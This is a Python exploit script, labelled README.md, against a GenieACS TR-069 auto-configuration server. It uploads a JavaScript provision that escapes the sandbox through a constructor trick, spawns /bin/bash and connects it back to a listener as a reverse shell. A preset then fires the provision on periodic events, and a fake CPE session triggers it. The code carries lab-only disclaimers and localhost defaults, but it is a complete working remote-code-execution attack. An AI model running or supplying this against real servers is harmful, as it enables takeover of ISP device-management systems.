# README.md
# Rendering markdown...
import random
import json
import string
import requests
import base64
import threading
import time
from xml.etree.ElementTree import Element, SubElement, tostring
# Configuration
# NOTE: the defaults point at a local/docker lab setup. Only run this against systems you are authorized to test.
TARGET_IP = "127.0.0.1" # IP of the GenieACS server (e.g. docker host)
LHOST_IP = "host.docker.internal" # Local address that receives the reverse shell (e.g. localhost/host.docker.internal)
LPORT = 4444 # Local port that receives the reverse shell
ACS_URL = f"http://{TARGET_IP}:7547/" # URL that send_request POSTs the CWMP SOAP messages to
NBI_URL = f"http://{TARGET_IP}:7557/" # Base URL for the /provisions and /presets PUT requests
def put_provision(name='revshell', LHOST=LHOST_IP, LPORT=LPORT):
    """Upload a provision script to the NBI with an HTTP PUT.

    The script body is a JavaScript snippet that connects to ``LHOST:LPORT``
    and attaches a ``/bin/bash`` process to that connection. It is sent to
    ``<NBI_URL>/provisions/<name>``. For authorized lab testing only.

    Args:
        name: Name under which the provision is stored.
        LHOST: Host the script connects back to.
        LPORT: Port the script connects back to.

    Returns:
        None. The request URL and the response body are printed; any
        exception is caught and printed instead of being raised.
    """
    # Braces that belong to the JavaScript are doubled because this is an
    # f-string; only {LHOST} and {LPORT} are substituted.
    payload = f"""
const global = declare.constructor.constructor('return this')();
const process = global.process;
const require = process.mainModule.require;
try {{
const net = require('net');
const {{ spawn }} = require('child_process');
// Create connection to attacker
const client = new net.Socket();
client.connect('{LPORT}', '{LHOST}', () => {{
// Spawn shell process
const shell = spawn('/bin/bash', ['-i']);
// Pipe shell I/O to network connection
client.pipe(shell.stdin);
shell.stdout.pipe(client);
shell.stderr.pipe(client);
// Handle connection close
shell.on('exit', () => client.end());
client.on('error', () => shell.kill());
}});
return {{
status: "Reverse shell initiated",
target: `{LHOST}:{LPORT}`
}};
}} catch(e) {{
return {{
error: "Reverse shell failed: " + e.message
}};
}}
"""
    try:
        # NBI_URL ends with "/", so collapse the doubled slash it produces.
        url = f"{NBI_URL}/provisions/{name}".replace("//provisions", "/provisions")
        print(f"URL: {url}")
        response = requests.put(url, data=payload, timeout=30)
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error creating GenieACS provision: {e}")
def put_preset(preset_name, provision_name='revshell'):
    """Create a preset on the NBI that runs a provision on "2 PERIODIC" events.

    The preset is sent as JSON with an HTTP PUT to
    ``<NBI_URL>/presets/<preset_name>``.

    Args:
        preset_name: Name of the preset; also used as its ``channel``.
        provision_name: Name of the provision the preset refers to.

    Returns:
        None. The payload, URL and response body are printed; any exception
        is caught and printed instead of being raised.
    """
    configuration = {"type": "provision", "name": provision_name, "args": None}
    payload = {
        "weight": 0,
        "channel": preset_name,
        "events": {"2 PERIODIC": True},
        "precondition": "",
        "configurations": [configuration],
    }
    try:
        print(f"Payload: {json.dumps(payload, indent=2)}")
        # NBI_URL ends with "/", so collapse the doubled slash it produces.
        url = f"{NBI_URL}/presets/{preset_name}".replace("//presets", "/presets")
        print(f"URL: {url}")
        response = requests.put(url, json=payload, timeout=30)
        print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error creating GenieACS preset: {e}")
# SOAP namespaces: prefix -> URI.
# create_soap_document writes each entry as an "xmlns:<prefix>" attribute on
# the envelope, in this order.
NAMESPACES = {
"soap-enc": "http://schemas.xmlsoap.org/soap/encoding/",
"soap-env": "http://schemas.xmlsoap.org/soap/envelope/",
"xsd": "http://www.w3.org/2001/XMLSchema",
"xsi": "http://www.w3.org/2001/XMLSchema-instance",
"cwmp": "urn:dslforum-org:cwmp-1-0"
}
# Module-level state shared by the session functions in this file
next_inform_timeout = None # threading.Timer for the next periodic inform, or None when nothing is scheduled
pending_inform = False # reset to False by start_session; not read anywhere in the visible code
device = None # parameter dict handed to methods.inform; assigned in the __main__ block
session = requests.Session() # shared HTTP session; start_session clears its cookies before each CWMP session
inform_interval = 2 # Periodic inform interval in seconds
def start_session(event=None):
    """
    Start a CWMP session by sending an Inform message.

    Cancels any pending periodic-inform timer, clears the cookies of the
    shared HTTP session, builds the Inform body with ``methods.inform`` and
    POSTs it inside a SOAP envelope. When that request returns,
    ``cpe_request`` is called to complete the session.

    Args:
        event (str, optional): Event code for the Inform message. When
            omitted or empty, "2 PERIODIC" is used, which is the same
            fallback ``methods.inform`` applies.
    """
    global next_inform_timeout, pending_inform

    # Resolve the default once so the log line below reports the event code
    # that is actually sent (it previously claimed '0 BOOTSTRAP' while
    # "2 PERIODIC" went out on the wire).
    event = event or "2 PERIODIC"

    # Cancel any existing timeout
    if next_inform_timeout:
        next_inform_timeout.cancel()
        next_inform_timeout = None

    # Reset session state and clear cookies to avoid 400 Bad Request
    pending_inform = False
    session.cookies.clear()

    print(f"Starting session with event: {event}")

    # Generate random request ID (8 character alphanumeric string)
    chars = string.ascii_lowercase + string.digits
    request_id = ''.join(random.choice(chars) for _ in range(8))

    def inform_callback(body):
        """Wrap the Inform body in a SOAP document and send it."""
        xml = create_soap_document(request_id, body)

        def send_request_callback(response_xml):
            # The parsed reply is not inspected; the session always proceeds
            # to the closing empty request.
            cpe_request()

        send_request(xml, send_request_callback)

    # Build the Inform body; inform_callback receives it when ready
    methods.inform(device, event, inform_callback)
def create_soap_document(request_id, body):
    """Wrap ``body`` in a SOAP envelope and return the document as a string.

    Args:
        request_id: Text placed in the ``cwmp:ID`` header element.
        body: Element appended to ``soap-env:Body``, or None for an empty
            body.

    Returns:
        The serialized envelope, preceded by an XML declaration line.
    """
    # One xmlns:<prefix> attribute per configured namespace.
    xmlns_attrs = {f"xmlns:{prefix}": uri for prefix, uri in NAMESPACES.items()}
    root = Element("soap-env:Envelope", xmlns_attrs)

    # Header carrying the request ID
    head = SubElement(root, "soap-env:Header")
    SubElement(head, "cwmp:ID", {"soap-env:mustUnderstand": "1"}).text = request_id

    # Body, left empty when no payload element was supplied
    content = SubElement(root, "soap-env:Body")
    if body is not None:
        content.append(body)

    return '<?xml version="1.0" encoding="UTF-8"?>\n' + tostring(root, encoding='unicode')
def send_request(xml, callback):
    """Send an HTTP POST with SOAP XML to ``ACS_URL`` and report the reply.

    Args:
        xml: Request body as a string; ``None`` or "" sends an empty body.
        callback: Called exactly once with the root element of the parsed
            response, or with ``None`` when the response has no body, is
            not well-formed XML, or the request failed.

    On a failed request (connection error, timeout, or an HTTP error
    status) the next periodic inform is scheduled before ``callback(None)``
    is invoked. Exceptions raised by ``callback`` itself propagate to the
    caller.
    """
    # "as ET" binds only ET, so the ``xml`` parameter is not shadowed.
    from xml.etree import ElementTree as ET

    headers = {
        'Content-Type': 'text/xml; charset="utf-8"',
        'SOAPAction': '""'
    }

    # Only the network call is guarded, so an exception coming out of the
    # callback is never mistaken for an HTTP failure.
    try:
        response = session.post(
            ACS_URL,
            data=xml or "",
            headers=headers,
            timeout=30
        )
        response.raise_for_status()
    except requests.exceptions.RequestException as e:
        print(f"HTTP request failed: {e}")
        # On error, schedule next periodic inform
        schedule_next_periodic_inform()
        callback(None)
        return

    # Parse the raw bytes so the parser honours the encoding declared in the
    # XML itself rather than the one guessed from the HTTP headers.
    response_xml = None
    if response.content:
        try:
            response_xml = ET.fromstring(response.content)
        except ET.ParseError:
            response_xml = None

    callback(response_xml)
def schedule_next_periodic_inform():
    """Arm a timer that starts a "2 PERIODIC" session after ``inform_interval`` seconds.

    A timer stored from an earlier call is cancelled before the new one is
    created and started.
    """
    global next_inform_timeout

    previous = next_inform_timeout
    if previous:
        previous.cancel()

    def _start_periodic_session():
        start_session("2 PERIODIC")

    next_inform_timeout = threading.Timer(inform_interval, _start_periodic_session)
    next_inform_timeout.start()
    print(f"Next periodic inform scheduled in {inform_interval} seconds")
def cpe_request():
    """Complete the CWMP session by POSTing an empty request body.

    When the request returns, a completion message is printed and the next
    periodic inform is scheduled.
    """
    def _on_session_end(_response_xml):
        # The reply content is not used.
        print("CWMP session completed")
        schedule_next_periodic_inform()

    print("Sending empty request to complete CWMP session...")
    send_request(None, _on_session_end)
class methods:
    """Namespace for builders of CWMP message bodies."""

    @staticmethod
    def inform(device, event, callback):
        """Build a ``cwmp:Inform`` element and pass it to ``callback``.

        Args:
            device: Mapping from parameter path to a two-item list whose
                second item is the value. When falsy (``None`` or empty),
                built-in placeholder values are used for every field.
            event: Event code text; "2 PERIODIC" is used when falsy.
            callback: Called once with the finished Inform element.
        """
        from datetime import datetime

        def _value(path, fallback):
            # Index 1 of the stored pair holds the parameter value.
            if not device:
                return fallback
            return device.get(path, ["", fallback])[1]

        root = Element("cwmp:Inform")

        # DeviceId: (child tag, parameter path, placeholder value)
        identity = SubElement(root, "DeviceId")
        for tag, path, fallback in (
            ("Manufacturer", "Device.DeviceInfo.Manufacturer", "Unknown"),
            ("OUI", "Device.DeviceInfo.ManufacturerOUI", "000000"),
            ("ProductClass", "Device.DeviceInfo.ProductClass", "CPE"),
            ("SerialNumber", "Device.DeviceInfo.SerialNumber", "123456"),
        ):
            SubElement(identity, tag).text = _value(path, fallback)

        # Event list holding a single EventStruct
        events = SubElement(root, "Event")
        entry = SubElement(events, "EventStruct")
        SubElement(entry, "EventCode").text = event or "2 PERIODIC"
        SubElement(entry, "CommandKey").text = ""

        SubElement(root, "MaxEnvelopes").text = "1"
        # Local time without timezone information
        SubElement(root, "CurrentTime").text = datetime.now().isoformat()
        SubElement(root, "RetryCount").text = "0"

        # Parameter list is sent empty
        SubElement(
            root,
            "ParameterList",
            {"soap-enc:arrayType": "cwmp:ParameterValueStruct[0]"},
        )

        callback(root)
def stop_periodic_informs():
    """Cancel the stored periodic-inform timer, if any, and print a notice."""
    global next_inform_timeout

    timer, next_inform_timeout = next_inform_timeout, None
    if timer:
        timer.cancel()
    print("Periodic informs stopped")
# Example usage
if __name__ == "__main__":
    # Generate random serial number (12 character alphanumeric string)
    chars = string.ascii_uppercase + string.digits
    random_serial = ''.join(random.choice(chars) for _ in range(12))

    # Upload the provision, then the preset that refers to it
    put_provision('revshell', LHOST_IP, LPORT)
    put_preset("exploit-periodic2", 'revshell')

    # Sample device data structure: parameter path -> [type, value]
    device = {
        "Device.DeviceInfo.Manufacturer": ["xsd:string", "DF"],
        "Device.DeviceInfo.ManufacturerOUI": ["xsd:string", "123456"],
        "Device.DeviceInfo.ProductClass": ["xsd:string", "Exploit"],
        "Device.DeviceInfo.SerialNumber": ["xsd:string", random_serial],
    }

    for banner_line in (
        "Starting CWMP session...",
        f"Endpoint: {ACS_URL}",
        f"Device Serial Number: {random_serial}",
        f"Periodic inform interval: {inform_interval} seconds",
    ):
        print(banner_line)

    try:
        # Start the initial session with the "0 BOOTSTRAP" event
        start_session("0 BOOTSTRAP")

        # Keep the main thread alive so the timer can run periodic informs
        print("Press Ctrl+C to stop periodic informs...")
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\nShutting down...")
        stop_periodic_informs()
        print("Program terminated")